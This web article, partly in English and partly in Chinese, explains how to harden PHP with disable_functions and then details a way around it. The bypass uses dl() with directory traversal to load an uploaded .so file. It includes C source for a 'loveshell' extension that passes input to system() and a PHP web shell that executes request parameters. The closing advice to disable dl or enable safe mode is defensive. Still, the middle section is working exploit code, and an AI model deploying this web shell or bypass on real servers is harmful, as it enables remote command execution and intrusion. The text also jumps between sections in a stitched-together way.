如果想保證
服務器的安全,請將這個函數加到disable_functions裡或者將安全模式打開吧,在安全模式下dl函數是無條件禁止的
Q. I run a small apache based
webserver for my personal use and it is shared with friends and family. However, most script kiddIE try to exploit
PHP application such as Wordpress using exec() , passthru() , shell_exec() , system() etc functions. How do I disable these functions to improve my PHP script security?
A. PHP has a lot of functions which can be used to crack your server if not used properly. You can set list of functions in php.ini using disable_functions directive. This directive allows you to disable certain functions for security reasons. It takes on a comma-delimited list of function names. disable_functions is not affected by Safe Mode. This directive must be set in PHP.ini For example, you cannot set this in httpd.conf.
Open PHP.ini file:
# vi /etc/PHP.ini
Find disable_functions and set new list as follows:
查找disable_functions然後用下面的替換
disable_functions =PHPinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
Save and close the file. Restart httpd:
# service httpd restart
Note that the disable_functions directive can not be used outside of the php.ini file which means that you cannot disable functions on a per-virtualhost or per-directory basis in your httpd.conf file. If we add this to our PHP.ini file:
注意下面的突破方法:建議打開安全模式 PHP是一款功能強大應用廣泛的腳本語言,很大一部分網站都是使用PHP架構的。因為其提供了強大的文件操作功能和與系統交互的功能,所以大部分的服務器都對PHP做了嚴格的限制,包括使用open_basedir限制可以操作的目錄以及使用disable_functions限制程序使用一些可以直接執行系統命令的函數如system,exec,passthru,shell_exec,proc_open等等。但是如果服務器沒有對dl()函數做限制,一樣可以利用dl()函數饒過這些限制。
dl()函數允許在php腳本裡動態加載php模塊,默認是加載extension_dir目錄裡的擴展,該選項是PHP_INI_SYSTEM范圍可修改的,只能在PHP.ini或者apache主配置文件裡修改。當然,你也可以通過enable_dl選項來關閉動態加載功能,而這個選項默認為On的,事實上也很少人注意到這個。dl()函數在設計時存在安全漏洞,可以用../這種目錄遍歷的方式指定加載任何一個目錄裡的so等擴展文件,extension_dir限制可以被隨意饒過。所以我們可以上傳自己的so文件,並且用dl函數加載這個so文件然後利用so文件裡的函數執行其他操作,包括系統命令。
PHP_FUNCTION(dl)
{
pval **file;
#ifdef ZTS
if ((strncmp(sapi_module.name, "CGI", 3)!=0) &&
(strcmp(sapi_module.name, "cli")!=0) &&
(strncmp(sapi_module.name, "embed", 5)!=0)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Not supported in multithreaded Web servers - use extension statements in your PHP.ini");
RETURN_FALSE;
} //驗證是否可以使用dl函數,在多線程web服務器裡是禁止的
#endif
/* obtain arguments */
if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &file) == FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(file); //取得參數
if (!PG(enable_dl)) {
PHP_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extentions aren't enabled");//驗證是否enable_dl,默認為on
} else if (PG(safe_mode)) {
PHP_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extensions aren't allowed when running in Safe Mode");//驗證是否safe_mode打開
} else {
PHP_dl(*file, MODULE_TEMPORARY, return_value TSRMLS_CC); //開始調用加載
EG(full_tables_cleanup) = 1;
}
下面是開始處理模塊的加載
void PHP_dl(pval *file, int type, pval *return_value TSRMLS_DC)
{
void *handle;
char *libpath;
zend_module_entry *module_entry, *tmp;
zend_module_entry *(*get_module)(void);
int error_type;
char *extension_dir; //定義一些變量
if (type==MODULE_PERSISTENT) {
/* Use the configuration hash directly, the INI mechanism is not yet initialized */
if (cfg_get_string("extension_dir", &extension_dir)==FAILURE) {
extension_dir = PHP_EXTENSION_DIR;
}
} else {
extension_dir = PG(extension_dir);
} //取得PHP.ini裡的設置也就是extension_dir的目錄
if (type==MODULE_TEMPORARY) {
error_type = E_WARNING;
} else {
error_type = E_CORE_WARNING;
}
if (extension_dir && extension_dir[0]){
int extension_dir_len = strlen(extension_dir);
libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);
if (IS_SLASH(extension_dir[extension_dir_len-1])) {
sprintf(libpath, "%s%s", extension_dir, Z_STRVAL_P(file)); /* SAFE */
} else {
sprintf(libpath, "%s%c%s", extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */
} //構造最終的so文件的位置,只是簡單的附加,並沒有對傳入的參數做任何檢查,包括open_basedir等
} else {
libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));
}
/* load dynamic symbol */
handle = DL_LOAD(libpath); //開始真正的調用了
看到了吧,我們可以調用任意的so了哦!下一步就是編寫自己的so模塊,並且調用他。按照官方提供的模塊編寫方法,我寫了個很簡單的,主要的導出函數loveshell如下:
PHP_FUNCTION(loveshell)
{
char *command;
int command_len;
if (ZEND_NUM_ARGS() != 1 || zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,"s", &command, &command_len) == FAILURE) {
WRONG_PARAM_COUNT;
}
system(command);
zend_printf("I recIEve %s",command);
}
注意由於php4和php5的結構不一樣,所以如果想要能順利調用擴展,那麼在php4環境下就要將上面的代碼放到php4環境下編譯,php5的就要在PHP5環境下編譯。我們將編寫好的擴展上傳到服務器,就可以利用下面的代碼執行命令了:
<?PHP
dl('../../../../../../../../../www/users/www.cnbct.org/loveshell.so');
$cmd=$_REQUEST[c]." 2>&1>tmp.txt";
loveshell($cmd);
echo "<br>";
echo file_get_contents('tmp.txt');
?>
所以如果想保證服務器的安全,請將這個函數加到disable_functions裡或者將安全模式打開吧,在安全模式下dl函數是無條件禁止的!:)
